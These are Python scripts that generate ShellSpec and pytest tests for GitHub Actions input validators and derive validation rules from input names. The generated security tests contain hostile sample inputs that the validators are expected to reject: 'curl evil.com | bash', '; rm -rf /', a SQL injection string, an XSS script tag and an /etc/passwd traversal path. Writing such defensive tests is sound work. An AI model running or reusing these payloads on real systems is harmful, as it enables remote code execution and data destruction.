This script generates test files for actions and validators based on their
definitions, without overwriting existing tests.
"""
# pylint: disable=invalid-name # Script name matches convention
from __future__ import annotations
import argparse
import logging
from pathlib import Path
import re
import sys
import yaml # pylint: disable=import-error
# Set up logging
logging.basicConfig(
level=logging.INFO,
format="%(levelname)s: %(message)s",
)
logger = logging.getLogger(__name__)
class TestGenerator:
"""Generate tests for GitHub Actions and validators."""
def __init__(self, project_root: Path, *, dry_run: bool = False) -> None:
"""Initialize the test generator.
Args:
project_root: Path to the project root directory
dry_run: If True, don't write files, just show what would be generated
"""
self.project_root = project_root
self.validate_inputs_dir = project_root / "validate-inputs"
self.tests_dir = project_root / "_tests"
self.generated_count = 0
self.skipped_count = 0
self.dry_run = dry_run
def generate_all_tests(self) -> None:
"""Generate tests for all actions and validators."""
logger.info("Starting test generation...")
# Generate ShellSpec tests for actions
self.generate_action_tests()
# Generate pytest tests for validators
self.generate_validator_tests()
# Generate tests for custom validators
self.generate_custom_validator_tests()
logger.info(
"Test generation complete: %d generated, %d skipped (already exist)",
self.generated_count,
self.skipped_count,
)
def generate_action_tests(self) -> None:
"""Generate ShellSpec tests for GitHub Actions."""
logger.info("Generating ShellSpec tests for actions...")
# Find all action directories
for item in sorted(self.project_root.iterdir()):
if not item.is_dir():
continue
action_yml = item / "action.yml"
if not action_yml.exists():
continue
# Skip special directories
if item.name.startswith((".", "_")) or item.name == "validate-inputs":
continue
self._generate_shellspec_test(item.name, action_yml)
def _generate_shellspec_test(self, action_name: str, action_yml: Path) -> None:
"""Generate ShellSpec test for a single action.
Args:
action_name: Name of the action
action_yml: Path to the action.yml file
"""
# Check if test already exists
test_file = self.tests_dir / "unit" / action_name / "validation.spec.sh"
if test_file.exists():
logger.debug("Test already exists for %s, skipping", action_name)
self.skipped_count += 1
return
# Load action definition
with action_yml.open() as f:
action_def = yaml.safe_load(f)
# Generate test content
test_content = self._generate_shellspec_content(action_name, action_def)
if self.dry_run:
logger.info("[DRY RUN] Would generate ShellSpec test: %s", test_file)
self.generated_count += 1
return
# Create test directory
test_file.parent.mkdir(parents=True, exist_ok=True)
# Write test file
with test_file.open("w", encoding="utf-8") as f:
f.write(test_content)
# Make executable
test_file.chmod(0o755)
logger.info("Generated ShellSpec test for %s", action_name)
self.generated_count += 1
def _generate_shellspec_content(self, action_name: str, action_def: dict) -> str:
"""Generate ShellSpec test content.
Args:
action_name: Name of the action
action_def: Action definition from action.yml
Returns:
ShellSpec test content
"""
inputs = action_def.get("inputs", {})
required_inputs = [name for name, config in inputs.items() if config.get("required", False)]
# Convert action name to readable format
readable_name = action_name.replace("-", " ").title()
# Use action description if available, otherwise use readable name
description = action_def.get("name", readable_name)
content = f"""#!/usr/bin/env bash
# ShellSpec tests for {action_name}
# Generated by generate-tests.py - Do not edit manually
# shellcheck disable=SC1091
. "$SHELLSPEC_HELPERDIR/../unit/spec_helper.sh"
Describe '{description} Input Validation'
"""
# Add setup
content += """
setup() {
export_test_env
export INPUT_ACTION_TYPE="${action_name}"
cleanup_test_env
}
Before 'setup'
After 'cleanup_test_env'
"""
# Generate test for required inputs
if required_inputs:
content += f""" Context 'Required inputs validation'
It 'should fail when required inputs are missing'
When run validate_inputs '{action_name}'
The status should be failure
The error should include 'required'
End
"""
for input_name in required_inputs:
env_var = f"INPUT_{input_name.upper().replace('-', '_')}"
content += f"""
It 'should fail without {input_name}'
unset {env_var}
When run validate_inputs '{action_name}'
The status should be failure
The error should include '{input_name}'
End
"""
# Generate test for valid inputs
content += """
Context 'Valid inputs'
It 'should pass with all valid inputs'
"""
# Add example values for each input
for input_name, config in inputs.items():
env_var = f"INPUT_{input_name.upper().replace('-', '_')}"
example_value = self._get_example_value(input_name, config)
content += f" export {env_var}='{example_value}'\n"
content += f""" When run validate_inputs '{action_name}'
The status should be success
The output should not include 'error'
End
End
"""
# Add input-specific validation tests
for input_name, config in inputs.items():
test_cases = self._generate_input_test_cases(input_name, config)
if test_cases:
content += f"""
Context '{input_name} validation'
"""
for test_case in test_cases:
content += test_case
content += " End\n"
content += "End\n"
return content
def _get_example_value(self, input_name: str, config: dict) -> str:
"""Get example value for an input based on its name and config.
Args:
input_name: Name of the input
config: Input configuration from action.yml
Returns:
Example value for the input
"""
# Check for default value
if "default" in config:
return str(config["default"])
# Common patterns
patterns = {
r"token": "${{ secrets.GITHUB_TOKEN }}",
r"version": "1.2.3",
r"path|file|directory": "./path/to/file",
r"url|endpoint": "https://example.com",
r"email": "test@example.com",
r"branch": "main",
r"tag": "v1.0.0",
r"image": "myapp:latest",
r"registry": "docker.io",
r"platform|architecture": "linux/amd64",
r"language": "javascript",
r"command": "echo test",
r"args|arguments": "--verbose",
r"message|description": "Test message",
r"name|title": "Test Name",
r"dry.?run|debug|verbose": "false",
r"push|publish|release": "true",
r"timeout|delay": "60",
r"retries|attempts": "3",
r"port": "8080",
r"host": "localhost",
}
# Match patterns
for pattern, value in patterns.items():
if re.search(pattern, input_name, re.IGNORECASE):
return value
# Default fallback
return "test-value"
def _generate_input_test_cases(
self,
input_name: str,
config: dict, # noqa: ARG002
) -> list[str]:
"""Generate test cases for a specific input.
Args:
input_name: Name of the input
config: Input configuration
Returns:
List of test case strings
"""
test_cases = []
env_var = f"INPUT_{input_name.upper().replace('-', '_')}"
# Boolean validation
if re.search(r"dry.?run|debug|verbose|push|publish", input_name, re.IGNORECASE):
test_cases.append(f"""
It 'should accept boolean values for {input_name}'
export {env_var}='true'
When run validate_inputs '${{action_name}}'
The status should be success
End
It 'should reject invalid boolean for {input_name}'
export {env_var}='invalid'
When run validate_inputs '${{action_name}}'
The status should be failure
The error should include 'boolean'
End
""")
# Version validation
elif "version" in input_name.lower():
test_cases.append(f"""
It 'should accept valid version for {input_name}'
export {env_var}='1.2.3'
When run validate_inputs '${{action_name}}'
The status should be success
End
It 'should accept version with v prefix for {input_name}'
export {env_var}='v1.2.3'
When run validate_inputs '${{action_name}}'
The status should be success
End
""")
# Token validation
elif "token" in input_name.lower():
test_cases.append(f"""
It 'should accept GitHub token for {input_name}'
export {env_var}='${{{{ secrets.GITHUB_TOKEN }}}}'
When run validate_inputs '${{action_name}}'
The status should be success
End
It 'should accept classic PAT for {input_name}'
export {env_var}='ghp_1234567890123456789012345678901234'
When run validate_inputs '${{action_name}}'
The status should be success
End
""")
# Path validation
elif re.search(r"path|file|directory", input_name, re.IGNORECASE):
test_cases.append(f"""
It 'should accept valid path for {input_name}'
export {env_var}='./valid/path'
When run validate_inputs '${{action_name}}'
The status should be success
End
It 'should reject path traversal for {input_name}'
export {env_var}='../../../etc/passwd'
When run validate_inputs '${{action_name}}'
The status should be failure
The error should include 'security'
End
""")
return test_cases
def generate_validator_tests(self) -> None:
"""Generate pytest tests for validators."""
logger.info("Generating pytest tests for validators...")
validators_dir = self.validate_inputs_dir / "validators"
tests_dir = self.validate_inputs_dir / "tests"
# Find all validator modules
for validator_file in sorted(validators_dir.glob("*.py")):
if validator_file.name in ("__init__.py", "base.py", "registry.py"):
continue
validator_name = validator_file.stem
test_file = tests_dir / f"test_{validator_name}.py"
# Skip if test already exists
if test_file.exists():
logger.debug("Test already exists for %s, skipping", validator_name)
self.skipped_count += 1
continue
# Generate test content
test_content = self._generate_pytest_content(validator_name)
if self.dry_run:
logger.info("[DRY RUN] Would generate pytest test: %s", test_file)
self.generated_count += 1
continue
# Write test file
with test_file.open("w", encoding="utf-8") as f:
f.write(test_content)
logger.info("Generated pytest test for %s", validator_name)
self.generated_count += 1
def _generate_pytest_content(self, validator_name: str) -> str:
"""Generate pytest test content for a validator.
Args:
validator_name: Name of the validator module
Returns:
pytest test content
"""
class_name = "".join(word.capitalize() for word in validator_name.split("_"))
if not class_name.endswith("Validator"):
class_name += "Validator"
content = f'''"""Tests for {validator_name} validator.
Generated by generate-tests.py - Do not edit manually.
"""
import pytest
from validators.{validator_name} import {class_name}
class Test{class_name}:
"""Test cases for {class_name}."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = {class_name}("test-action")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
'''
# Add common test methods based on validator type
if "version" in validator_name:
content += self._add_version_tests()
elif "token" in validator_name:
content += self._add_token_tests()
elif "boolean" in validator_name:
content += self._add_boolean_tests()
elif "numeric" in validator_name:
content += self._add_numeric_tests()
elif "file" in validator_name:
content += self._add_file_tests()
elif "network" in validator_name:
content += self._add_network_tests()
elif "docker" in validator_name:
content += self._add_docker_tests()
elif "security" in validator_name:
content += self._add_security_tests()
else:
content += self._add_generic_tests(validator_name)
return content
def _add_version_tests(self) -> str:
"""Add version-specific test methods."""
return '''
def test_valid_semantic_version(self):
"""Test valid semantic version."""
assert self.validator.validate_semantic_version("1.2.3") is True
assert self.validator.validate_semantic_version("1.0.0-alpha") is True
assert self.validator.validate_semantic_version("2.0.0+build123") is True
def test_invalid_semantic_version(self):
"""Test invalid semantic version."""
assert self.validator.validate_semantic_version("1.2") is False
assert self.validator.validate_semantic_version("invalid") is False
assert self.validator.validate_semantic_version("1.2.3.4") is False
def test_valid_calver(self):
"""Test valid calendar version."""
assert self.validator.validate_calver("2024.3.1") is True
assert self.validator.validate_calver("2024.03.15") is True
assert self.validator.validate_calver("24.3.1") is True
def test_github_expressions(self):
"""Test GitHub expression handling."""
assert self.validator.validate_semantic_version("${{ env.VERSION }}") is True
assert self.validator.validate_calver("${{ steps.version.outputs.version }}") is True
'''
def _add_token_tests(self) -> str:
"""Add token-specific test methods."""
return '''
def test_valid_github_token(self):
"""Test valid GitHub tokens."""
# Classic PAT (36 chars)
assert self.validator.validate_github_token("ghp_" + "a" * 32) is True
# Fine-grained PAT (82 chars)
assert self.validator.validate_github_token("github_pat_" + "a" * 71) is True
# GitHub expression
assert self.validator.validate_github_token("${{ secrets.GITHUB_TOKEN }}") is True
def test_invalid_github_token(self):
"""Test invalid GitHub tokens."""
assert self.validator.validate_github_token("invalid") is False
assert self.validator.validate_github_token("ghp_short") is False
assert self.validator.validate_github_token("") is False
def test_other_token_types(self):
"""Test other token types."""
# NPM token
assert self.validator.validate_npm_token("npm_" + "a" * 32) is True
# PyPI token
assert self.validator.validate_pypi_token("pypi-AgEIcHlwaS5vcmc" + "a" * 100) is True
'''
def _add_boolean_tests(self) -> str:
"""Add boolean-specific test methods."""
return '''
def test_valid_boolean_values(self):
"""Test valid boolean values."""
valid_values = ["true", "false", "True", "False", "TRUE", "FALSE",
"yes", "no", "on", "off", "1", "0"]
for value in valid_values:
assert self.validator.validate_boolean(value) is True
assert not self.validator.has_errors()
def test_invalid_boolean_values(self):
"""Test invalid boolean values."""
invalid_values = ["maybe", "unknown", "2", "-1", "", "null"]
for value in invalid_values:
self.validator.clear_errors()
assert self.validator.validate_boolean(value) is False
assert self.validator.has_errors()
def test_github_expressions(self):
"""Test GitHub expression handling."""
assert self.validator.validate_boolean("${{ inputs.dry_run }}") is True
assert self.validator.validate_boolean("${{ env.DEBUG }}") is True
'''
def _add_numeric_tests(self) -> str:
"""Add numeric-specific test methods."""
return '''
def test_valid_integers(self):
"""Test valid integer values."""
assert self.validator.validate_integer("42") is True
assert self.validator.validate_integer("-10") is True
assert self.validator.validate_integer("0") is True
def test_invalid_integers(self):
"""Test invalid integer values."""
assert self.validator.validate_integer("3.14") is False
assert self.validator.validate_integer("abc") is False
assert self.validator.validate_integer("") is False
def test_numeric_ranges(self):
"""Test numeric range validation."""
assert self.validator.validate_range("5", min_val=1, max_val=10) is True
assert self.validator.validate_range("15", min_val=1, max_val=10) is False
assert self.validator.validate_range("-5", min_val=0) is False
def test_github_expressions(self):
"""Test GitHub expression handling."""
assert self.validator.validate_integer("${{ inputs.timeout }}") is True
assert self.validator.validate_range("${{ env.RETRIES }}", min_val=1) is True
'''
def _add_file_tests(self) -> str:
"""Add file-specific test methods."""
return '''
def test_valid_file_paths(self):
"""Test valid file paths."""
assert self.validator.validate_file_path("./src/main.py") is True
assert self.validator.validate_file_path("/absolute/path/file.txt") is True
assert self.validator.validate_file_path("relative/path.yml") is True
def test_path_traversal_detection(self):
"""Test path traversal detection."""
assert self.validator.validate_file_path("../../../etc/passwd") is False
assert self.validator.validate_file_path("./valid/../../../etc/passwd") is False
assert self.validator.has_errors()
def test_file_extensions(self):
"""Test file extension validation."""
assert self.validator.validate_yaml_file("config.yml") is True
assert self.validator.validate_yaml_file("config.yaml") is True
assert self.validator.validate_yaml_file("config.txt") is False
def test_github_expressions(self):
"""Test GitHub expression handling."""
assert self.validator.validate_file_path("${{ github.workspace }}/file.txt") is True
assert self.validator.validate_yaml_file("${{ inputs.config_file }}") is True
'''
def _add_network_tests(self) -> str:
"""Add network-specific test methods."""
return '''
def test_valid_urls(self):
"""Test valid URL formats."""
assert self.validator.validate_url("https://example.com") is True
assert self.validator.validate_url("http://localhost:8080") is True
assert self.validator.validate_url("https://api.example.com/v1/endpoint") is True
def test_invalid_urls(self):
"""Test invalid URL formats."""
assert self.validator.validate_url("not-a-url") is False
assert self.validator.validate_url("ftp://example.com") is False
assert self.validator.validate_url("") is False
def test_valid_emails(self):
"""Test valid email addresses."""
assert self.validator.validate_email("user@example.com") is True
assert self.validator.validate_email("test.user+tag@company.co.uk") is True
def test_invalid_emails(self):
"""Test invalid email addresses."""
assert self.validator.validate_email("invalid") is False
assert self.validator.validate_email("@example.com") is False
assert self.validator.validate_email("user@") is False
def test_github_expressions(self):
"""Test GitHub expression handling."""
assert self.validator.validate_url("${{ secrets.WEBHOOK_URL }}") is True
assert self.validator.validate_email("${{ github.event.pusher.email }}") is True
'''
def _add_docker_tests(self) -> str:
"""Add Docker-specific test methods."""
return '''
def test_valid_image_names(self):
"""Test valid Docker image names."""
assert self.validator.validate_image_name("myapp") is True
assert self.validator.validate_image_name("my-app_v2") is True
# Registry paths supported
assert self.validator.validate_image_name("registry.example.com/myapp") is True
def test_valid_tags(self):
"""Test valid Docker tags."""
assert self.validator.validate_tag("latest") is True
assert self.validator.validate_tag("v1.2.3") is True
assert self.validator.validate_tag("feature-branch-123") is True
def test_valid_platforms(self):
"""Test valid Docker platforms."""
assert self.validator.validate_architectures("linux/amd64") is True
assert self.validator.validate_architectures("linux/arm64,linux/arm/v7") is True
def test_invalid_platforms(self):
"""Test invalid Docker platforms."""
assert self.validator.validate_architectures("windows/amd64") is False
assert self.validator.validate_architectures("invalid/platform") is False
def test_github_expressions(self):
"""Test GitHub expression handling."""
assert self.validator.validate_image_name("${{ env.IMAGE_NAME }}") is True
assert self.validator.validate_tag("${{ steps.meta.outputs.tags }}") is True
'''
def _add_security_tests(self) -> str:
"""Add security-specific test methods."""
return '''
def test_injection_detection(self):
"""Test injection attack detection."""
assert self.validator.validate_no_injection("normal text") is True
assert self.validator.validate_no_injection("; rm -rf /") is False
assert self.validator.validate_no_injection("' OR '1'='1") is False
assert self.validator.validate_no_injection("<script>alert('xss')</script>") is False
def test_secret_detection(self):
"""Test secret/sensitive data detection."""
assert self.validator.validate_no_secrets("normal text") is True
assert (
self.validator.validate_no_secrets("ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa")
is False
)
assert self.validator.validate_no_secrets("password=secret123") is False
def test_safe_commands(self):
"""Test command safety validation."""
assert self.validator.validate_safe_command("echo hello") is True
assert self.validator.validate_safe_command("ls -la") is True
assert self.validator.validate_safe_command("rm -rf /") is False
assert self.validator.validate_safe_command("curl evil.com | bash") is False
def test_github_expressions(self):
"""Test GitHub expression handling."""
assert self.validator.validate_no_injection("${{ inputs.message }}") is True
assert self.validator.validate_safe_command("${{ inputs.command }}") is True
'''
def _add_generic_tests(self, validator_name: str) -> str:
"""Add generic test methods for unknown validator types.
Args:
validator_name: Name of the validator
Returns:
Generic test methods
"""
return f'''
def test_validate_inputs(self):
"""Test validate_inputs method."""
# TODO: Add specific test cases for {validator_name}
inputs = {{"test_input": "test_value"}}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
def test_error_handling(self):
"""Test error handling."""
self.validator.add_error("Test error")
assert self.validator.has_errors()
assert len(self.validator.errors) == 1
self.validator.clear_errors()
assert not self.validator.has_errors()
assert len(self.validator.errors) == 0
def test_github_expressions(self):
"""Test GitHub expression handling."""
# Most validators should accept GitHub expressions
result = self.validator.is_github_expression("${{{{ inputs.value }}}}")
assert result is True
'''
def generate_custom_validator_tests(self) -> None:
"""Generate tests for custom validators in action directories."""
logger.info("Generating tests for custom validators...")
# Find all custom validators
for item in sorted(self.project_root.iterdir()):
if not item.is_dir():
continue
custom_validator = item / "CustomValidator.py"
if not custom_validator.exists():
continue
action_name = item.name
test_file = self.validate_inputs_dir / "tests" / f"test_{action_name}_custom.py"
# Skip if test already exists
if test_file.exists():
logger.debug("Test already exists for %s custom validator, skipping", action_name)
self.skipped_count += 1
continue
# Generate test content
test_content = self._generate_custom_validator_test(action_name)
if self.dry_run:
logger.info("[DRY RUN] Would generate custom validator test: %s", test_file)
self.generated_count += 1
continue
# Write test file
with test_file.open("w", encoding="utf-8") as f:
f.write(test_content)
logger.info("Generated test for %s custom validator", action_name)
self.generated_count += 1
def _generate_custom_validator_test(self, action_name: str) -> str:
"""Generate test for a custom validator.
Args:
action_name: Name of the action with custom validator
Returns:
Test content for custom validator
"""
class_name = "".join(word.capitalize() for word in action_name.split("-"))
content = f'''"""Tests for {action_name} custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
import sys
from pathlib import Path
import pytest
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "{action_name}"
sys.path.insert(0, str(action_path))
from CustomValidator import CustomValidator
class TestCustom{class_name}Validator:
"""Test cases for {action_name} custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("{action_name}")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for {action_name}
inputs = {{}}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for {action_name}
inputs = {{"invalid_key": "invalid_value"}}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for {action_name}
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for {action_name}
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {{
"test_input": "${{{{ github.token }}}}",
}}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
'''
# Add action-specific test methods based on action name
if "docker" in action_name:
content += '''
def test_docker_specific_validation(self):
"""Test Docker-specific validation."""
inputs = {
"image": "myapp:latest",
"platforms": "linux/amd64,linux/arm64",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
'''
elif "codeql" in action_name:
content += '''
def test_codeql_specific_validation(self):
"""Test CodeQL-specific validation."""
inputs = {
"language": "javascript,python",
"queries": "security-extended",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
'''
elif "label" in action_name:
content += '''
def test_label_specific_validation(self):
"""Test label-specific validation."""
inputs = {
"labels": ".github/labels.yml",
"token": "${{ secrets.GITHUB_TOKEN }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
'''
content += '''
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0
'''
return content
def main() -> None:
"""Main entry point for test generation."""
parser = argparse.ArgumentParser(description="Generate tests for GitHub Actions and validators")
parser.add_argument(
"--project-root",
type=Path,
default=Path.cwd(),
help="Path to project root (default: current directory)",
)
parser.add_argument(
"--verbose",
"-v",
action="store_true",
help="Enable verbose logging",
)
parser.add_argument(
"--dry-run",
action="store_true",
help="Show what would be generated without creating files",
)
args = parser.parse_args()
if args.verbose:
logging.getLogger().setLevel(logging.DEBUG)
# Validate project root
if not args.project_root.exists():
logger.error("Project root does not exist: %s", args.project_root)
sys.exit(1)
validate_inputs = args.project_root / "validate-inputs"
if not validate_inputs.exists():
logger.error("validate-inputs directory not found in %s", args.project_root)
sys.exit(1)
# Run test generation
if args.dry_run:
logger.info("DRY RUN MODE - No files will be created")
generator = TestGenerator(args.project_root, dry_run=args.dry_run)
generator.generate_all_tests()
if __name__ == "__main__":
main()

581
validate-inputs/scripts/update-validators.py Executable file
View File

@@ -0,0 +1,581 @@
#!/usr/bin/env python3
"""update-validators.py
Automatically generates validation rules for GitHub Actions
by scanning action.yml files and applying convention-based detection.
Usage:
python update-validators.py [--dry-run] [--action action-name]
"""
from __future__ import annotations
import argparse
from pathlib import Path
import re
import sys
from typing import Any
import yaml # pylint: disable=import-error
class ValidationRuleGenerator:
"""Generate validation rules for GitHub Actions automatically.
This class scans GitHub Action YAML files and generates validation rules
based on convention-based detection patterns and special case handling.
"""
def __init__(self, *, dry_run: bool = False, specific_action: str | None = None) -> None:
"""Initialize the validation rule generator.
Args:
dry_run: If True, show what would be generated without writing files
specific_action: If provided, only generate rules for this action
"""
self.dry_run = dry_run
self.specific_action = specific_action
self.actions_dir = Path(__file__).parent.parent.parent.resolve()
# Convention patterns for automatic detection
# Order matters - more specific patterns should come first
self.conventions = {
# CodeQL-specific patterns (high priority)
"codeql_language": re.compile(r"\blanguage\b", re.IGNORECASE),
"codeql_queries": re.compile(r"\bquer(y|ies)\b", re.IGNORECASE),
"codeql_packs": re.compile(r"\bpacks?\b", re.IGNORECASE),
"codeql_build_mode": re.compile(r"\bbuild[_-]?mode\b", re.IGNORECASE),
"codeql_config": re.compile(r"\bconfig\b", re.IGNORECASE),
"category_format": re.compile(r"\bcategor(y|ies)\b", re.IGNORECASE),
# GitHub token patterns (high priority)
"github_token": re.compile(
r"\b(github[_-]?token|gh[_-]?token|token|auth[_-]?token|api[_-]?key)\b",
re.IGNORECASE,
),
# CalVer version patterns (high priority - check before semantic)
"calver_version": re.compile(
r"\b(release[_-]?tag|release[_-]?version|monthly[_-]?version|date[_-]?version)\b",
re.IGNORECASE,
),
# Specific version types (high priority)
"dotnet_version": re.compile(r"\bdotnet[_-]?version\b", re.IGNORECASE),
"terraform_version": re.compile(r"\bterraform[_-]?version\b", re.IGNORECASE),
"node_version": re.compile(r"\bnode[_-]?version\b", re.IGNORECASE),
# Docker-specific patterns (high priority)
"docker_image_name": re.compile(r"\bimage[_-]?name\b", re.IGNORECASE),
"docker_tag": re.compile(r"\b(tags?|image[_-]?tags?)\b", re.IGNORECASE),
"docker_architectures": re.compile(
r"\b(arch|architecture|platform)s?\b",
re.IGNORECASE,
),
# Namespace with lookahead (specific pattern)
"namespace_with_lookahead": re.compile(r"\bnamespace\b", re.IGNORECASE),
# Numeric ranges (specific ranges)
"numeric_range_0_16": re.compile(
r"\b(parallel[_-]?builds?|builds?[_-]?parallel)\b",
re.IGNORECASE,
),
"numeric_range_1_10": re.compile(
r"\b(retry|retries|attempt|attempts|max[_-]?retry)\b",
re.IGNORECASE,
),
"numeric_range_1_128": re.compile(r"\bthreads?\b", re.IGNORECASE),
"numeric_range_256_32768": re.compile(r"\bram\b", re.IGNORECASE),
"numeric_range_0_100": re.compile(r"\b(quality|percent|percentage)\b", re.IGNORECASE),
# File and path patterns
"file_path": re.compile(
r"\b(paths?|files?|dir|directory|config|dockerfile"
r"|ignore[_-]?file|key[_-]?files?)\b",
re.IGNORECASE,
),
"file_pattern": re.compile(r"\b(file[_-]?pattern|glob[_-]?pattern)\b", re.IGNORECASE),
"branch_name": re.compile(r"\b(branch|ref|base[_-]?branch)\b", re.IGNORECASE),
# User and identity patterns
"email": re.compile(r"\b(email|mail)\b", re.IGNORECASE),
"username": re.compile(r"\b(user|username|commit[_-]?user)\b", re.IGNORECASE),
# URL patterns (high priority)
"url": re.compile(r"\b(url|registry[_-]?url|api[_-]?url|endpoint)\b", re.IGNORECASE),
# Scope and namespace patterns
"scope": re.compile(r"\b(scope|namespace)\b", re.IGNORECASE),
# Security patterns for text content that could contain injection
"security_patterns": re.compile(
r"\b(changelog|notes|message|content|description|body|text|comment|summary|release[_-]?notes)\b",
re.IGNORECASE,
),
# Regex pattern validation (ReDoS detection)
"regex_pattern": re.compile(
r"\b(regex|pattern|validation[_-]?regex|regex[_-]?pattern)\b",
re.IGNORECASE,
),
# Additional validation types
"report_format": re.compile(r"\b(report[_-]?format|format)\b", re.IGNORECASE),
"plugin_list": re.compile(r"\b(plugins?|plugin[_-]?list)\b", re.IGNORECASE),
"prefix": re.compile(r"\b(prefix|tag[_-]?prefix)\b", re.IGNORECASE),
# Boolean patterns (broad, should be lower priority)
"boolean": re.compile(
r"\b(dry-?run|verbose|enable|disable|auto|skip|force|cache|provenance|sbom|scan|sign|fail[_-]?on[_-]?error|nightly)\b",
re.IGNORECASE,
),
# File extensions pattern
"file_extensions": re.compile(r"\b(file[_-]?extensions?|extensions?)\b", re.IGNORECASE),
# Registry pattern
"registry": re.compile(r"\bregistry\b", re.IGNORECASE),
# PHP-specific patterns
"php_extensions": re.compile(r"\b(extensions?|php[_-]?extensions?)\b", re.IGNORECASE),
"coverage_driver": re.compile(r"\b(coverage|coverage[_-]?driver)\b", re.IGNORECASE),
# Generic version pattern (lowest priority - catches remaining version fields)
"semantic_version": re.compile(r"\bversion\b", re.IGNORECASE),
}
# Special cases that need manual handling
self.special_cases = {
# CalVer fields that might not be detected
"release-tag": "calver_version",
# Flexible version fields (support both CalVer and SemVer)
"version": "flexible_version", # For github-release action
# File paths that might not be detected
"pre-commit-config": "file_path",
"config-file": "file_path",
"ignore-file": "file_path",
"readme-file": "file_path",
"working-directory": "file_path",
# Numeric fields that need positive integer validation
"days-before-stale": "positive_integer",
"days-before-close": "positive_integer",
# Version fields with specific types
"buildx-version": "semantic_version",
"buildkit-version": "semantic_version",
"tflint-version": "terraform_version",
"default-version": "semantic_version",
"force-version": "semantic_version",
"golangci-lint-version": "semantic_version",
"prettier-version": "semantic_version",
"eslint-version": "strict_semantic_version",
"flake8-version": "semantic_version",
"autopep8-version": "semantic_version",
"composer-version": "semantic_version",
# Tokens and passwords
"dockerhub-password": "github_token",
"npm_token": "github_token",
"password": "github_token",
# Complex fields that should skip validation
"build-args": None, # Can be empty
"context": None, # Default handled
"cache-from": None, # Complex cache syntax
"cache-export": None, # Complex cache syntax
"cache-import": None, # Complex cache syntax
"build-contexts": None, # Complex syntax
"secrets": None, # Complex syntax
"platform-build-args": None, # JSON format
"extensions": None, # PHP extensions list
"tools": None, # PHP tools list
"args": None, # Composer args
"stability": None, # Composer stability
"registry-url": "url", # URL format
"scope": "scope", # NPM scope
"plugins": None, # Prettier plugins
"file-extensions": "file_extensions", # File extension list
"file-pattern": None, # Glob pattern
"enable-linters": None, # Linter list
"disable-linters": None, # Linter list
"success-codes": None, # Exit code list
"retry-codes": None, # Exit code list
"ignore-paths": None, # Path patterns
"key-files": None, # Cache key files
"restore-keys": None, # Cache restore keys
"env-vars": None, # Environment variables
# Action-specific fields that need special handling
"type": None, # Cache type enum (npm, composer, go, etc.) - complex enum,
# skip validation
"paths": None, # File paths for caching (comma-separated) - complex format,
# skip validation
"command": None, # Shell command - complex format, skip validation for safety
"backoff-strategy": None, # Retry strategy enum - complex enum, skip validation
"shell": None, # Shell type enum - simple enum, skip validation
# Removed image-name and tag - now handled by docker_image_name and docker_tag patterns
# Numeric inputs with different ranges
"timeout": "numeric_range_1_3600", # Timeout should support higher values
"retry-delay": "numeric_range_1_300", # Retry delay should support higher values
"max-warnings": "numeric_range_0_10000",
# version-file-parser specific fields
"language": None, # Simple enum (node, php, python, go, dotnet)
"tool-versions-key": None, # Simple string (nodejs, python, php, golang, dotnet)
"dockerfile-image": None, # Simple string (node, python, php, golang, dotnet)
"validation-regex": "regex_pattern", # Regex pattern - validate for ReDoS
}
def get_action_directories(self) -> list[str]:
"""Get all action directories"""
entries = []
for item in self.actions_dir.iterdir():
if (
item.is_dir()
and not item.name.startswith(".")
and item.name != "validate-inputs"
and (item / "action.yml").exists()
):
entries.append(item.name)
return entries
def parse_action_file(self, action_name: str) -> dict[str, Any] | None:
"""Parse action.yml file to extract inputs"""
action_file = self.actions_dir / action_name / "action.yml"
try:
with action_file.open(encoding="utf-8") as f:
content = f.read()
action_data = yaml.safe_load(content)
return {
"name": action_data.get("name", action_name),
"description": action_data.get("description", ""),
"inputs": action_data.get("inputs", {}),
}
except Exception as error:
print(f"Failed to parse {action_file}: {error}")
return None
def detect_validation_type(self, input_name: str, input_data: dict[str, Any]) -> str | None:
"""Detect validation type based on input name and description"""
description = input_data.get("description", "")
# Check special cases first - highest priority
if input_name in self.special_cases:
return self.special_cases[input_name]
# Special handling for version fields that might be CalVer
# Check if description mentions calendar/date/monthly/release
if input_name == "version" and any(
word in description.lower() for word in ["calendar", "date", "monthly", "release"]
):
return "calver_version"
# Apply convention patterns in order (more specific first)
# Test input name first (highest confidence), then description
for validator, pattern in self.conventions.items():
if pattern.search(input_name):
return validator # Direct name match has highest confidence
# If no name match, try description
for validator, pattern in self.conventions.items():
if pattern.search(description):
return validator # Description match has lower confidence
return None # No validation detected
def sort_object_by_keys(self, obj: dict[str, Any]) -> dict[str, Any]:
"""Sort object keys alphabetically for consistent output"""
return {key: obj[key] for key in sorted(obj.keys())}
def generate_rules_for_action(self, action_name: str) -> dict[str, Any] | None:
"""Generate validation rules for a single action"""
action_data = self.parse_action_file(action_name)
if not action_data:
return None
required_inputs = []
optional_inputs = []
conventions = {}
